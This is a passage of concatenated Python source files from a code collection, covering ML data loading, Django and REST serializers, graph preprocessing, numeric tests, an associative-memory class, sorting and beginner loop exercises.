list(gold_view.select_covered(event_type, sent))\n for i in range(0, len(events_in_sent)):\n for j in range(i + 1, len(events_in_sent)):\n\n event1 = events_in_sent[i]\n event2 = events_in_sent[j]\n\n if (event1, event2) in rel_lookup:\n label = rel_lookup[(event1, event2)]\n event1_text = event1.get_covered_text()\n event2_text = event2.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event1_text, event2_text)\n ee_rels_in_sent.append(rel_string)\n\n if (event2, event1) in rel_lookup:\n label = rel_lookup[(event2, event1)]\n event1_text = event1.get_covered_text()\n event2_text = event2.get_covered_text()\n rel_string = '%s(%s, %s)' % (label, event2_text, event1_text)\n ee_rels_in_sent.append(rel_string)\n\n ee_output = 'event-event relations: '\n if len(ee_rels_in_sent) == 0:\n ee_output = ee_output + 'none'\n else:\n ee_output = ee_output + ' '.join(ee_rels_in_sent)\n\n self.outputs.append(et_output + '; ' + ee_output)\n\ndef main():\n \"\"\"This is where it happens\"\"\"\n\n tok = T5Tokenizer.from_pretrained('t5-small')\n data = Data(\n xmi_dir=args.xmi_dir,\n tokenizer=tok,\n max_input_length=args.max_input_length,\n max_output_length=args.max_output_length,\n partition=args.partition,\n n_files=args.n_files)\n\n for index in range(len(data)):\n input_ids = data[index]['input_ids']\n output_ids = data[index]['labels']\n print(tok.decode(input_ids, skip_special_tokens=True))\n print(tok.decode(output_ids, skip_special_tokens=True))\n print()\n\nif __name__ == \"__main__\":\n \"\"\"My main man\"\"\"\n\n base = os.environ['DATA_ROOT']\n arg_dict = dict(\n xmi_dir=os.path.join(base, 'Thyme/Xmi/'),\n model_dir='Model/',\n model_name='t5-small',\n max_input_length=200,\n max_output_length=200,\n partition='dev',\n n_files=5)\n\n args = argparse.Namespace(**arg_dict)\n print('hyper-parameters: %s\\n' % args)\n\n main()\n","sub_path":"Archive/T5/dataset_rel.py","file_name":"dataset_rel.py","file_ext":"py","file_size_in_byte":9675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"619517096","text":"# __str__:\r\n# Trigger: printing the object name automatically calls the contents of __str__\r\n# Note: __str__ must contain a return; whatever follows return is what is shown when the object is printed\r\n\r\nclass Person:\r\n def __init__(self, name, age):\r\n self.name = name\r\n self.age = age\r\n\r\n def __str__(self):\r\n return '姓名是:' + self.name + ',年龄:' + str(self.age)\r\n\r\n\r\np = Person('tom', 18)\r\nprint(p)\r\n\r\n# Printing the object name by itself only yields an address, which is of little use to a developer.\r\n# If you want printing the object name to give the developer more information,\r\n\r\np1 = Person('jack', 20)\r\nprint(p1)\r\n\r\n'''\r\nSummary: magic methods\r\nKey points:\r\n__init__ (the constructor, the first method called after the object's memory is allocated), __str__\r\n\r\nGood to know:\r\n__new__ purpose: allocates the object's memory \r\n\r\n__del__ purpose: called once no reference points to the object. 99% of the time it does not need to be overridden.\r\n\r\n__call__ purpose: lets an object be called as if it were a function.\r\n\r\n\r\nOverall summary:\r\nMethods:\r\n ordinary method ---> key point\r\n def method_name(self, [params]):\r\n method body\r\n \r\n obj.method()\r\n \r\n calling one method from another:\r\n class A:\r\n def a(self):\r\n pass\r\n def b(self):\r\n # call method a\r\n self.a()\r\n \r\n class method: \r\n @classmethod \r\n def method_name(cls, [params]):\r\n pass\r\n \r\n ClassName.method_name()\r\n obj.method_name()\r\n \r\n static method: \r\n @staticmethod\r\n def method_name([params]):\r\n pass\r\n \r\n ClassName.method_name()\r\n obj.method_name()\r\n \r\n magic methods:\r\n methods that run automatically\r\n \r\n print(p) ---> __str__\r\n\r\n'''\r\n","sub_path":"Week4(56集)/day15(11集)/代码/day15_面向对象/object09.py","file_name":"object09.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"532989023","text":"\n\n\ndef word_count(s):\n ignored = \"\\\":;,.-+=/\\|[]{}()*^&?!\"\n results = {}\n\n # translation_table = dict.fromkeys(map(ord, 
'\"{:;,.-+=/|\\[]}()*^&\"'), None)\n #\n # s = s.translate(translation_table)\n #\n # print(s)\n\n if s:\n\n for char in ignored:\n s = s.replace(char, \"\")\n\n words = s.lower().split(' ')\n while '' in words:\n words.remove('')\n\n for i in range(len(words)):\n words[i] = words[i].strip()\n\n for word in words:\n if word in results:\n results[word] += 1\n else:\n results[word] = 1\n\n return results\n\n if not s:\n\n return results\n\n # count each word and return the count\n # remove special characters\n # convert string to lowercase\n # we are not ignoring apostrophes\n # if letter is in dict remove it from array\n\n\n'''\n{'hello': 2, 'my': 2, 'cat': 2, 'and': 1, \"doesn't\": 1, 'say': 1, 'back': 1}\n'''\n#\nif __name__ == \"__main__\":\n x = word_count(\"\")\n print(\"expected outcome {}\")\n print(f\"Outcome: {x}\")\n\n\n x = word_count(\"Hello hello\")\n print(\"expected outcome {\"\"hello\"\": 2}\")\n print(f\"Outcome: {x}\")\n #\n # print(\"expected outcome {\"\"hello\"\": 2}\")\n # print(f\"Outcome: {x}\")\n\n x = word_count('a a\\ra\\na\\ta \\t\\r\\n')\n # print(f\"expected outcome: \"'a'\": 5\")\n # print(f\"Outcome: {x}\")\n\n # white_chars = [c for c in x.whitespace]\n\n # for i in x:\n # x[i] = str(x[i])\n # white_chars = [c for c in x[i].whitespace]\n\n # x = (word_count(\"\"))\n #\n # print(x)\n #\n # if x == {}:\n # print(\"success\")\n\n\n # print(word_count(\"Hello hello\"))\n # print(word_count('Hello, my cat. And my cat doesn\\'t say \"hello\" back.'))\n # print(word_count('This is a test of the emergency broadcast network. This is only a test.'))\n\n","sub_path":"applications/word_count/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45104906","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . 
import views\nfrom django.conf.urls import include, url\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.index, name='index'),\n url(r'^carrera/', views.ListaCarrera, name='ListaCarrera'),\n url(r'^piloto/', views.ListaPiloto, name='ListaPiloto'),\n url(r'^registro/', views.ListaRegistro, name='ListaRegistro'),\n url(r'^nuevaCarrera/', views.NuevaCarrera, name='NuevaCarrera'),\n url(r'^nuevoPiloto/', views.NuevoPiloto, name='NuevoPiloto'),\n url(r'^nuevoRegistro/', views.NuevoRegistro, name='NuevoRegistro'),\n\n]\n","sub_path":"auto/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"550016365","text":"from rest_framework.authentication import SessionAuthentication, BaseAuthentication\nfrom rest_framework import routers, serializers,viewsets,permissions\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\nfrom rest_framework.reverse import reverse\n\nfrom django.contrib.postgres.fields import JSONField\nimport json\n\nfrom .models import Device\n\nfrom cooperate.serializers import BranchSerializer\n\n\nclass DeviceCreateSerializer(serializers.ModelSerializer):\n class Meta:\n model = Device\n fields= [\n 'result',\n 'user',\n 'branch'\n ]\n\n# class JSONSerializerField(serializers.JSONField):\n# \"\"\" Serializer for JSONField -- required to make field writable\"\"\"\n# def to_internal_value(self, data):\n# return data\n# def to_representation(self, value):\n# return value\n#\n# class JSONField(serializers.Field):\n# def to_representation(self, obj):\n# return json.loads(obj)\n#\n# def to_internal_value(self, data):\n# return json.dumps(data)\n\nclass DeviceUpdateSerializer(serializers.ModelSerializer):\n # user = serializers.CharField(source='user.username', read_only=True)\n class Meta:\n model = Device\n fields = [\n 'id',\n 'timestamp',\n 'result',\n 'user',\n 'branch'\n ]\n\n\n\n# class DeviceUrlHyperlinkedIdentifyField(serializers.HyperlinkedIdentityField):\n# # lookup_field = 'id'\n# # pass\n#\n# def get_url(self,obj, view_name, request, format):\n# kwargs = {\n# \"id\" : obj.id\n# }\n# return reverse(view_name, kwargs= kwargs, request = request, format= format )\n\n\n\nclass DeviceSerializer(serializers.HyperlinkedModelSerializer):\n # url = DeviceUrlHyperlinkedIdentifyField(view_name='device_detail_api')\n url = serializers.HyperlinkedIdentityField('device_detail_api', lookup_field='pk')\n class Meta:\n model = Device\n fields = [\n 'id',\n 'timestamp',\n 'result',\n 'url'\n\n ]\n\nclass DeviceViewSet(viewsets.ModelViewSet):\n authentication_classes = [BaseAuthentication, JSONWebTokenAuthentication]\n permission_classes = [permissions.IsAuthenticated]\n queryset = Device.objects.all()\n serializer_class = DeviceSerializer\n\n\n\n","sub_path":"source/device/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"66535677","text":"import numpy as np\nimport scipy.sparse as sp\n\n\ndef sparse_to_tuple(sparse_mx):\n if not sp.isspmatrix_coo(sparse_mx):\n sparse_mx = sparse_mx.tocoo()\n coords = np.vstack((sparse_mx.row, sparse_mx.col)).transpose()\n values = sparse_mx.data\n shape = sparse_mx.shape\n return coords, values, shape\n\n\ndef preprocess_graph(adj):\n adj = sp.coo_matrix(adj)\n adj_ = adj + sp.eye(adj.shape[0])\n rowsum = np.array(adj_.sum(1))\n degree_mat_inv_sqrt = 
sp.diags(np.power(rowsum, -0.5).flatten())\n adj_normalized = adj_.dot(degree_mat_inv_sqrt).transpose().dot(degree_mat_inv_sqrt).tocoo()\n return sparse_to_tuple(adj_normalized)\n\n\ndef construct_feed_dict(adj_normalized, adj, features, placeholders):\n # construct feed dictionary\n feed_dict = dict()\n feed_dict.update({placeholders['features']: features})\n feed_dict.update({placeholders['adj']: adj_normalized})\n feed_dict.update({placeholders['adj_orig']: adj})\n return feed_dict\n\n\ndef old_mask_test_edges(adj):\n # Function to build test set with 10% positive links\n # NOTE: Splits are randomized and results might slightly deviate from reported numbers in the paper.\n # TODO: Clean up.\n\n # Remove diagonal elements\n adj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\n adj.eliminate_zeros()\n # Check that diag is zero:\n assert np.diag(adj.todense()).sum() == 0\n\n adj_triu = sp.triu(adj)\n adj_tuple = sparse_to_tuple(adj_triu)\n edges = adj_tuple[0]\n edges_all = sparse_to_tuple(adj)[0]\n num_test = int(np.floor(edges.shape[0] / 10.))\n num_val = int(np.floor(edges.shape[0] / 20.))\n\n all_edge_idx = list(range(edges.shape[0]))\n np.random.shuffle(all_edge_idx)\n val_edge_idx = all_edge_idx[:num_val]\n test_edge_idx = all_edge_idx[num_val:(num_val + num_test)]\n test_edges = edges[test_edge_idx]\n val_edges = edges[val_edge_idx]\n train_edges = np.delete(edges, np.hstack([test_edge_idx, val_edge_idx]), axis=0)\n\n def ismember(a, b, tol=5):\n rows_close = np.all(np.round(a - b[:, None], tol) == 0, axis=-1)\n return np.any(rows_close)\n\n # creates list of edges not in the original graph for link prediction testing\n test_edges_false = []\n while len(test_edges_false) < len(test_edges):\n idx_i = np.random.randint(0, adj.shape[0])\n idx_j = np.random.randint(0, adj.shape[0])\n if idx_i == idx_j:\n continue\n if ismember([idx_i, idx_j], edges_all):\n continue\n if test_edges_false:\n if ismember([idx_j, idx_i], np.array(test_edges_false)):\n continue\n if ismember([idx_i, idx_j], np.array(test_edges_false)):\n continue\n test_edges_false.append([idx_i, idx_j])\n\n # creates list of edges not in the original graph for link prediction validation\n val_edges_false = []\n while len(val_edges_false) < len(val_edges):\n idx_i = np.random.randint(0, adj.shape[0])\n idx_j = np.random.randint(0, adj.shape[0])\n if idx_i == idx_j:\n continue\n if ismember([idx_i, idx_j], train_edges):\n continue\n if ismember([idx_j, idx_i], train_edges):\n continue\n if ismember([idx_i, idx_j], val_edges):\n continue\n if ismember([idx_j, idx_i], val_edges):\n continue\n if val_edges_false:\n if ismember([idx_j, idx_i], np.array(val_edges_false)):\n continue\n if ismember([idx_i, idx_j], np.array(val_edges_false)):\n continue\n val_edges_false.append([idx_i, idx_j])\n\n assert ~ismember(test_edges_false, edges_all)\n assert ~ismember(val_edges_false, edges_all)\n assert ~ismember(val_edges, train_edges)\n assert ~ismember(test_edges, train_edges)\n assert ~ismember(val_edges, test_edges)\n\n data = np.ones(train_edges.shape[0])\n\n # Re-build adj matrix\n adj_train = sp.csr_matrix((data, (train_edges[:, 0], train_edges[:, 1])), shape=adj.shape)\n adj_train = adj_train + adj_train.T\n\n # NOTE: these edge lists only contain single direction of edge!\n return adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false\n\n\ndef mask_test_edges(adj, val_perc=5., test_perc=10.):\n # Function to build test set with 10% positive links\n # NOTE: Splits are 
randomized and results might slightly deviate from reported numbers in the paper.\n\n # Remove diagonal elements\n adj = adj - sp.dia_matrix((adj.diagonal()[np.newaxis, :], [0]), shape=adj.shape)\n adj.eliminate_zeros()\n # Check that diag is zero:\n assert np.diag(adj.todense()).sum() == 0\n\n adj_triu = sp.triu(adj)\n adj_tuple = sparse_to_tuple(adj_triu)\n edges = adj_tuple[0]\n edges_all = sparse_to_tuple(adj)[0]\n num_test = int(np.floor(edges.shape[0] / test_perc))\n num_val = int(np.floor(edges.shape[0] / val_perc))\n\n all_edge_idx = list(range(edges.shape[0]))\n np.random.shuffle(all_edge_idx)\n val_edge_idx = all_edge_idx[:num_val]\n test_edge_idx = all_edge_idx[num_val:(num_val + num_test)]\n test_edges = edges[test_edge_idx]\n val_edges = edges[val_edge_idx]\n train_edges = np.delete(edges, np.hstack([test_edge_idx, val_edge_idx]), axis=0)\n\n # To generate the negative samples we use the following procedure:\n # 1. Construct a full dense matrix\n # 2. Remove the already existing edges of the graph leaving only the negative edges\n # 3. Shuffle the indexes of the remaining negative edges\n # 4. Use the proper amount of edges for validation and testing.\n\n # Step 1.\n full_dense = np.ones(adj.shape)\n S_full = sp.csr_matrix(full_dense)\n # Step 2.\n S_negative = S_full - adj\n S_negative_triu = sp.triu(S_negative)\n idx_false = sparse_to_tuple(S_negative_triu)[0]\n\n # Step 3.\n false_edges_idx = list(range(idx_false.shape[0]))\n np.random.shuffle(false_edges_idx)\n\n # Step 4.\n val_edges_false_idx = false_edges_idx[:num_val]\n test_edges_false_idx = false_edges_idx[num_val:(num_val + num_test)]\n val_edges_false = idx_false[val_edges_false_idx]\n test_edges_false = idx_false[test_edges_false_idx]\n\n def ismember(a, b, tol=5):\n rows_close = np.all(np.round(a - b[:, None], tol) == 0, axis=-1)\n return np.any(rows_close)\n\n assert ~ismember(test_edges_false, edges_all)\n assert ~ismember(val_edges_false, edges_all)\n assert ~ismember(val_edges, train_edges)\n assert ~ismember(test_edges, train_edges)\n assert ~ismember(val_edges, test_edges)\n\n data = np.ones(train_edges.shape[0])\n\n # Re-build adj matrix\n adj_train = sp.csr_matrix((data, (train_edges[:, 0], train_edges[:, 1])), shape=adj.shape)\n adj_train = adj_train + adj_train.T\n\n # NOTE: these edge lists only contain single direction of edge!\n return adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false\n","sub_path":"src/gae/gae/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"38603402","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/quantecon/tests/test_compute_fp.py\n# Compiled at: 2019-07-07 21:19:40\n# Size of source mod 2**32: 4809 bytes\n\"\"\"\nTests for compute_fp.py\n\nReferences\n----------\n\nhttps://www.math.ucdavis.edu/~hunter/book/ch3.pdf\n\nTODO: add multivariate case\n\n\"\"\"\nimport unittest, numpy as np\nfrom nose.tools import ok_, raises\nfrom quantecon import compute_fixed_point\n\nclass TestFPLogisticEquation(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.mu_1 = 0.2\n cls.mu_2 = 0.3\n cls.unit_inverval = [\n 0.1, 0.3, 0.6, 0.9]\n cls.kwargs = {'error_tol':1e-05, \n 'max_iter':200, 'verbose':0}\n\n def T(self, x, mu):\n return 4.0 * mu * x * (1.0 - x)\n\n 
def test_contraction_1(self):\n \"\"\"compute_fp: convergence inside interval of convergence\"\"\"\n f = lambda x: self.T(x, self.mu_1)\n for i in self.unit_inverval:\n self.assertTrue(abs(compute_fixed_point(f, i, **self.kwargs)) < 0.0001)\n\n def test_not_contraction_2(self):\n \"\"\"compute_fp: no convergence outside interval of convergence\"\"\"\n f = lambda x: self.T(x, self.mu_2)\n for i in self.unit_inverval:\n self.assertFalse(abs(compute_fixed_point(f, i, **self.kwargs)) < 0.0001)\n\n def test_contraction_2(self):\n \"\"\"compute_fp: convergence inside interval of convergence\"\"\"\n f = lambda x: self.T(x, self.mu_2)\n fp = (4 * self.mu_2 - 1) / (4 * self.mu_2)\n for i in self.unit_inverval:\n self.assertTrue(abs(compute_fixed_point(f, i, **self.kwargs) - fp) < 0.0001)\n\n def test_not_contraction_1(self):\n \"\"\"compute_fp: no convergence outside interval of convergence\"\"\"\n f = lambda x: self.T(x, self.mu_1)\n fp = (4 * self.mu_1 - 1) / (4 * self.mu_1)\n for i in self.unit_inverval:\n self.assertFalse(abs(compute_fixed_point(f, i, **self.kwargs) - fp) < 0.0001)\n\n def test_imitation_game_method(self):\n \"\"\"compute_fp: Test imitation game method\"\"\"\n method = 'imitation_game'\n error_tol = self.kwargs['error_tol']\n for mu in [self.mu_1, self.mu_2]:\n for i in self.unit_inverval:\n fp_computed = compute_fixed_point(self.T, i, method=method, mu=mu, **self.kwargs)\n self.assertTrue(abs(self.T(fp_computed, mu=mu) - fp_computed) <= error_tol)\n\n i = np.asarray(self.unit_inverval)\n fp_computed = compute_fixed_point(self.T, i, method=method, mu=mu, **self.kwargs)\n self.assertTrue(abs(self.T(fp_computed, mu=mu) - fp_computed).max() <= error_tol)\n\n\nclass TestComputeFPContraction:\n\n def setUp(self):\n self.coeff = 0.5\n self.methods = ['iteration', 'imitation_game']\n\n def f(self, x):\n return self.coeff * x\n\n def test_num_iter_one(self):\n init = 1.0\n error_tol = self.coeff\n for method in self.methods:\n fp_computed = compute_fixed_point((self.f), init, error_tol=error_tol,\n method=method)\n ok_(fp_computed <= error_tol * 2)\n\n def test_num_iter_large(self):\n init = 1.0\n buff_size = 256\n max_iter = buff_size + 2\n error_tol = self.coeff ** max_iter\n for method in self.methods:\n fp_computed = compute_fixed_point((self.f), init, error_tol=error_tol,\n max_iter=max_iter,\n method=method,\n print_skip=max_iter)\n ok_(fp_computed <= error_tol * 2)\n\n def test_2d_input(self):\n error_tol = self.coeff ** 4\n for method in self.methods:\n init = np.array([[-1, 0.5], [-0.3333333333333333, 0.1]])\n fp_computed = compute_fixed_point((self.f), init, error_tol=error_tol,\n method=method)\n ok_((fp_computed <= error_tol * 2).all())\n\n\n@raises(ValueError)\ndef test_raises_value_error_nonpositive_max_iter():\n f = lambda x: 0.5 * x\n init = 1.0\n max_iter = 0\n compute_fixed_point(f, init, max_iter=max_iter)","sub_path":"pycfiles/quantecon-0.4.6-py3.7/test_compute_fp.cpython-37.py","file_name":"test_compute_fp.cpython-37.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"501237085","text":"import numpy as np\n\nN = 7 # Nº of species\n\ndeltas = np.array(\n # [0.27, -0.3] # Phase shifts for N = 2\n [-0.27, 0, 0.27] # Phase shifts for N = 3\n ) # Ignored otherwise\n\nr = 0.333 # Environment parameter\ng = 1 # Growth parameter\na = 0.8 # Growth amplitude\nb = 0.6 # Competition amplitude\n\ndt = 0.01\ni_max = 100000\nprint_every = 10\nseed_n = 12345\n\nresults_dir = 
\"general_a_0.8\"\n\n","sub_path":"general_a_0.8/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239671573","text":"#!/usr/bin/env python\n\n# Created by Raul Peralta-Lozada\n# GPU version added by Ivan Torres-Rodriguez\nimport cupy\nimport numpy\n\n\nclass AssociativeMemoryError(Exception):\n pass\n\n\nclass AssociativeMemory(object):\n def __init__(self, n: int, m: int):\n \"\"\"\n Parameters\n ----------\n n : int\n The size of the domain.\n m : int\n The size of the range.\n \"\"\"\n self.n = n\n self.m = m\n self.grid = cupy.zeros((self.m, self.n), dtype=cupy.bool)\n\n def __str__(self):\n grid = cupy.zeros(self.grid.shape, dtype=cupy.unicode)\n grid[:] = 'O'\n r, c = cupy.nonzero(self.grid)\n for i in zip(r, c):\n grid[i] = 'X'\n return str(grid)\n\n @property\n def n(self):\n return self._n\n\n @n.setter\n def n(self, value: int):\n if value > 0:\n self._n = value\n else:\n raise ValueError('Invalid value for n.')\n\n @property\n def m(self):\n return self._m\n\n @m.setter\n def m(self, value: int):\n if value > 0:\n self._m = value\n else:\n raise ValueError('Invalid value for m.')\n\n @property\n def grid(self):\n return self._grid\n\n @grid.setter\n def grid(self, new_grid: cupy.ndarray):\n if (isinstance(new_grid, cupy.ndarray) and\n new_grid.dtype == cupy.bool and\n new_grid.shape == (self.m, self.n)):\n self._grid = new_grid\n else:\n raise ValueError('Invalid grid assignment.')\n\n @property\n def entropy(self) -> float:\n \"\"\"Return the entropy of the Associative Memory.\"\"\"\n e = 0.0 # entropy\n v = self.grid.sum(axis=0) # number of marked cells in the columns\n for vi in v:\n if vi != 0:\n e += cupy.log2(1. / vi)\n e *= (-1.0 / self.n)\n return e\n\n @classmethod\n def from_grid(cls, grid: cupy.ndarray) -> 'AssociativeMemory':\n associative_mem = cls(grid.shape[1], grid.shape[0])\n associative_mem.grid = grid\n return associative_mem\n\n @staticmethod\n def vector_to_grid(vector, input_range, min_value):\n # now is only binary\n vector = cupy.ravel(vector)\n n = vector.size\n if vector.max() > input_range or vector.min() < min_value:\n raise ValueError('Values in the input vector are invalid. ',input_range,vector.max(),vector.min())\n grid = cupy.zeros((input_range, n), cupy.bool)\n vector -= min_value\n grid[vector, cupy.arange(vector.shape[0])] = True\n grid = cupy.flipud(grid)\n return grid\n \n @staticmethod\n def vector_to_grid_pad(vector, input_range, min_value, padding=1):\n # now is only binary\n vector = cupy.ravel(vector)\n n = vector.size\n if vector.max() > input_range or vector.min() < min_value:\n raise ValueError('Values in the input vector are invalid. 
',input_range,vector.max(),vector.min())\n grid = cupy.zeros((input_range, n), cupy.bool)\n vector -= min_value\n for offset in range(-padding,padding+1):\n for vecOff,i in zip(vector+offset,cupy.arange(vector.shape[0])):\n if vecOff <= input_range and vecOff >= min_value: \n grid[int(vecOff), i] = True\n grid = cupy.flipud(grid)\n return grid\n \n \n @staticmethod\n def impl(a,b):\n return cupy.logical_or(cupy.logical_not(a),b)\n \n \n\n def abstract(self, vector_input, input_range=2, min_value=0) -> None:\n if vector_input.size != self.n:\n raise ValueError('Invalid size of the input data.')\n else:\n grid_input = self.vector_to_grid_pad(vector_input, input_range,\n min_value, int(numpy.round(0.1*input_range)) )\n #self.grid = self.grid | grid_input\n self.grid = cupy.logical_or(self.grid,grid_input)\n \n \n\n def reduce(self, vector_input, input_range=2, min_value=0):\n if vector_input.size != self.n:\n raise AssociativeMemoryError('Invalid size of the input data.')\n else:\n grid_input = self.vector_to_grid(vector_input,\n input_range, min_value)\n #grid_output = cupy.zeros(self.grid.shape, dtype=self.grid.dtype)\n '''\n for i, cols in enumerate(zip(self.grid.T, grid_input.T)):\n (i1, ) = cupy.nonzero(cols[0])\n (i2, ) = cupy.nonzero(cols[1])\n #if cupy.all(self.in1d(i2,i1)):\n if cupy.all(self.impl(cols[0],cols[1])):\n # TODO: finish the reduce operation\n #if i1.size == i2.size:\n pass\n # grid_output[0:255, i] =\n else:\n raise AssociativeMemoryError('Applicability '\n 'condition error.')\n '''\n grid_imp=self.impl(grid_input,self.grid)\n if cupy.all(grid_imp):\n return True\n else:\n #raise AssociativeMemoryError('Applicability condition error.')\n return False\n\n \n \n #return grid_input\n","sub_path":"Reconocedor/associative_gpu.py","file_name":"associative_gpu.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"105688168","text":"# -*- coding: utf-8 -*-\n\"\"\"Some utility functions\"\"\"\n\nimport csv\nimport re\nimport sys\nimport logging\n\nLOG = logging.getLogger(__name__)\n\n\n# From https://docs.python.org/2/library/csv.html\ndef _unicode_csv_reader(unicode_csv_data, dialect=csv.excel, **kwargs):\n # csv.py doesn't do Unicode; encode temporarily as UTF-8:\n csv_reader = csv.reader(utf_8_encoder(unicode_csv_data),\n dialect=dialect, **kwargs)\n for row in csv_reader:\n # decode UTF-8 back to Unicode, cell by cell:\n yield [unicode(cell, 'utf-8') for cell in row]\n\n\ndef _unicode_csv_dict_reader(unicode_csv_data, fieldnames=None, **kwargs):\n if fieldnames:\n fieldnames = [val.encode('utf-8') for val in fieldnames]\n csv_reader = csv.DictReader(unicode_csv_data,\n fieldnames=fieldnames, **kwargs)\n for row in csv_reader:\n # decode UTF-8 back to Unicode, cell by cell:\n yield {unicode(key, 'utf-8'): unicode(value, 'utf-8') for key, value in row.items()}\n\n\ndef utf_8_encoder(unicode_csv_data):\n for line in unicode_csv_data:\n yield line.encode('utf-8')\n\n\ndef _matching_lines_py2(input_stream, pattern_string, include_header=False):\n \"\"\"return lines that match a regular expression pattern\"\"\"\n pattern = re.compile(pattern_string)\n this_is_header = include_header\n for line in input_stream:\n if this_is_header:\n yield line\n this_is_header = False\n else:\n if pattern.match(unicode(line, 'utf-8')):\n yield line\n\n\ndef _matching_lines_py3(input_stream, pattern_string, include_header=False):\n \"\"\"return lines that match a regular expression pattern\"\"\"\n pattern 
= re.compile(pattern_string)\n this_is_header = include_header\n for line in input_stream:\n if this_is_header:\n yield line\n this_is_header = False\n else:\n if pattern.match(line):\n yield line\n\n\nif sys.version_info[0] == 3:\n unicode_csv_dict_reader = csv.DictReader\n unicode_csv_reader = csv.reader\n matching_lines = _matching_lines_py3\nelse:\n unicode_csv_dict_reader = _unicode_csv_dict_reader\n unicode_csv_reader = _unicode_csv_reader\n matching_lines = _matching_lines_py2\n","sub_path":"older/rc-query-csv/rc_query_csv/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"259922892","text":"def Quicksort(arr, start, end):\n\tif (end > start):\n\t\tpivot = Partition(arr, start, end)\n\t\tQuicksort(arr, start, pivot - 1)\n\t\tQuicksort(arr, pivot + 1, end)\n\ndef Partition(arr, p, q):\n\tpivot = q\n\ti = p - 1\n\tfor j in range(p, pivot):\n\t\tif (arr[j] < arr[pivot]):\n\t\t\ti += 1\n\t\t\tarr[i], arr[j] = arr[j], arr[i]\n\tpivot = i + 1\n\tarr.insert(pivot, arr.pop(q))\n\treturn pivot\n\nl = [10, 5, 6, 1, 7, 12, 5, 6, 124]\nQuicksort(l, 0, len(l) - 1)\nprint (l)","sub_path":"Sorting Algorithms (Python)/Sorting_Algorithms__Python_.py","file_name":"Sorting_Algorithms__Python_.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"562105315","text":"#i=1\r\n#while i<5:\r\n #print(\"değere +1 eklendi\",i)\r\n #i=i+1\r\n#--------------------------------------\r\n#First, with i=1, execution enters the while loop. Since i is less than 5, it moves\r\n#down a line and prints i=1. Then 1 is added to i,\r\n#and control returns to the top of the loop, where the i<5 condition is checked\r\n#again. i was 2. Since i<5 held, execution moved down a line,\r\n#printed the value of i, then added 1 to i, making it 3.\r\n#The loop repeated the same way until i was 4, when the i<5 condition\r\n#was checked, execution moved down a line and printed the value 4. After that,\r\n#1 was added to i, making it 5. Control returned to the top of the loop and checked\r\n#whether i<5 still held. 
This time, since i=5 does not satisfy i<5,\r\n#the loop stopped.\r\n\r\n#-------------------------------------------------------------\r\n\r\n#i=0\r\n#liste=[]\r\n#while i<5:\r\n #i=i+1\r\n #print(\"İ değeri +1 arttırıldı ve listeye eklendi:\",i)\r\n #liste.append(i)\r\n #print(liste)\r\n\r\n#-------------------------------------------------------------\r\n\r\n#yas=35\r\n#while yas<45:\r\n #yas=yas+1\r\n #print(\"yeni yaşınız kutlu olsun:\",yas)\r\n\r\n#----------------------------------------------------------\r\n \r\n#while True:\r\n #deger=input(\"çıkmak için q tuşuna basınız\")\r\n #if deger ==\"q\":\r\n #break\r\n #else :\r\n #print(\"yarra yedin\")\r\n\r\n#------------------------------------------------\r\n\r\n\r\n#ORGANIC SEARCH - PAID ADS - SOCIAL MEDIA\r\n\r\norganık=[]\r\nucretlıreklam=[]\r\nsosyalmedya=[]\r\n\r\nwhile True:\r\n x=input(\"ORGANİK ARAMA-Aramak istediğiniz bilgiyi yazınız.(Organik Arama Kanalından Çıkış İçin 'q' bas.)\")\r\n organık.append(x)\r\n print(\"Organik Arama Geçmişine Bir Bilgi Eklenerek +1 Arttırıldı.\")\r\n print(len(organık))\r\n if x==\"q\":\r\n print(\"Organik Arama Kanalından Çıkış Yaptınız akabinde Ücretli Reklam Arama Kanalına Geçtiniz.\")\r\n break\r\n elif x==\"q\":\r\n continue\r\n\r\n\r\nwhile True:\r\n y=input(\"Ücretli ARAMA-Aramak İstediğiniz bilgiyi yazınız.(Ücretli Arama Kanalından Çıkış İçin 'q' bas.)\")\r\n ucretlıreklam.append(y)\r\n print(\"Ücretli Arama Geçmişine Bir Bilgi Eklenerek +1 Arttırıldı\")\r\n print(len(ucretlıreklam))\r\n if y==\"q\":\r\n 